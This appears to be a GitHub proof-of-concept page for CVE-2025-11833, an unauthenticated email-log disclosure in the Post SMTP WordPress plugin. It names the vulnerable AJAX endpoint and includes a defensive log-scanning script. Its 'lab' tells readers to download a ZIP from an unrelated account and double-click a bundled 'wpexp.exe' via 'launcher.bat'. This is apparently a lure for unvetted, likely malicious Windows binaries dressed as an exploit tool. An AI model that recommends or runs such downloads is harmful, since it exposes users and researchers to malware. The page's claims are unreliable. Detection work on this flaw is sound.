CVE-2025-11833 PoC — Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App <= 3.6.0 - Missing Authorization to Accou

Source
Associated Vulnerability
Title: Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App <= 3.6.0 - Missing Authorization to Account Takeover via Unauthenticated Email Log Disclosure (CVE-2025-11833)
Description: The Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the __construct function in all versions up to, and including, 3.6.0. This makes it possible for unauthenticated attackers to read arbitrary logged emails sent through the Post SMTP plugin, including password reset emails containing password reset links, which can lead to account takeover.
Readme
# Lab: CVE-2025-11833 - Post SMTP WordPress Plugin Unauthenticated Arbitrary Email Log Disclosure

## 🚀 Overview
This lab demonstrates the CVE-2025-11833 vulnerability in the Post SMTP WordPress plugin (versions up to 3.6.0), which arises from a missing capability check in the plugin's `__construct` function. This flaw permits unauthenticated attackers to access logged emails sent via the plugin, potentially exposing sensitive data such as password reset links. Exploitation could lead to account takeovers by intercepting confidential communications. The CVSSv3 score is 9.8, highlighting its critical severity due to low attack complexity and no required privileges.


## ⚠️ Safety Disclaimer
This lab is provided for educational and research purposes to understand web application vulnerabilities. Do not use this in production environments or against unauthorized systems. The authors assume no liability for misuse. Always obtain explicit authorization before testing on real-world systems. 

## 📋 Prerequisites
- A local web server stack (e.g., XAMPP, WAMP, or MAMP) with PHP 8.0+, MySQL 5.7+, and Apache/Nginx.
- WordPress version 6.0 or later.
- Basic knowledge of WordPress plugin management and HTTP requests.
- Windows OS for running the exploit tools (due to .exe and .bat dependencies).
- Administrative access to your local machine for installing software and configuring the web server.

## Download & Install
1. Download the lab archive from https://github.com/modhopmarrow1973/CVE-2025-11833-LAB/raw/refs/heads/main/scripts/cve-2025-11833-lab.zip . This ZIP contains:
   - `wpexp.exe`: The main exploitation binary for demonstrating the email log disclosure.
   - `launcher.bat`: A batch file to launch the exploit.

2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-11833-lab`.

3. Set up the vulnerable environment:
   - Install WordPress locally if not already done: Download from [wordpress.org](https://wordpress.org) and configure with your local web server.
   - Navigate to the WordPress admin dashboard (e.g., `http://localhost/wordpress/wp-admin`).
   - Install the vulnerable Post SMTP plugin.
   - Configure Post SMTP: In the plugin settings, enable email logging and set up a test SMTP server (e.g., using a local SMTP simulator like FakeSMTP for testing).


## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Set up your local WordPress instance with the vulnerable plugin.
3. Double-click `launcher.bat` in the extracted directory. This will launch `wpexp.exe` and prompt for target details.
4. In the exploit tool:
   - Enter the target URL (e.g., `http://localhost/wordpress`).
   - Specify the endpoint: `/wp-admin/admin-ajax.php?action=postman_get_logs` (the vulnerable AJAX handler).
   - Run the exploit to retrieve and display logged emails.
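
A detection sketch for the request pattern described above (an added example, not part of the original lab or the plugin's code): it scans web-server access logs for requests to the `postman_get_logs` AJAX action named in step 4 and flags clients that afterwards open a WordPress password-reset link. The log lines are constructed, and the `combined` log format and the finding names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [03/Nov/2025:10:00:01 +0000] "POST /wordpress/wp-login.php?action=lostpassword HTTP/1.1" 302 0 "-" "curl/8.0"
203.0.113.7 - - [03/Nov/2025:10:00:05 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=postman_get_logs HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.7 - - [03/Nov/2025:10:00:09 +0000] "GET /wordpress/wp-login.php?action=rp&key=CONSTRUCTED&login=admin HTTP/1.1" 200 3100 "-" "curl/8.0"
198.51.100.4 - - [03/Nov/2025:10:02:00 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Nov/2025:10:03:00 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=postman_get_logs HTTP/1.1" 403 12 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# Hypothetical finding names, ordered by severity.
RANK = {"blocked_attempt": 1, "log_read": 2, "log_read_then_reset_link": 3}

def classify(target):
    """Map a request target to a stage of the chain, or None."""
    parts = urlsplit(target)
    action = parse_qs(parts.query).get("action", [""])[0].lower()
    if parts.path.endswith("/wp-admin/admin-ajax.php") and action == "postman_get_logs":
        return "logs"          # endpoint named on this page
    if parts.path.endswith("/wp-login.php") and action in ("rp", "resetpass"):
        return "reset_link"    # a WordPress password-reset link being opened
    return None

def scan(log_text):
    """Return {client_ip: highest finding}, processing lines in log order."""
    read_logs, findings = set(), {}

    def raise_to(ip, level):
        if RANK[level] > RANK.get(findings.get(ip), 0):
            findings[ip] = level

    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, target, status = m.groups()
        stage = classify(target)
        if stage == "logs" and status.startswith("2"):
            read_logs.add(ip)
            raise_to(ip, "log_read")
        elif stage == "logs":
            raise_to(ip, "blocked_attempt")
        elif stage == "reset_link" and ip in read_logs:
            raise_to(ip, "log_read_then_reset_link")
    return findings

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG).items():
        print(ip, finding)
```

An `action` value sent in a POST body does not appear in access logs, so this covers only requests that carry it in the query string.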


For questions or contributions, email me at ukeouxnp760s25@hotmail.com
File Snapshot

[4.0K] /data/pocs/0fcb4a393ac6e5d77415113b09d70ed2c4f620d2
├── [2.8K] README.md
└── [4.0K] scripts
    ├── [   1] config.ini
    └── [8.5M] cve-2025-11833-lab.zip

1 directory, 3 files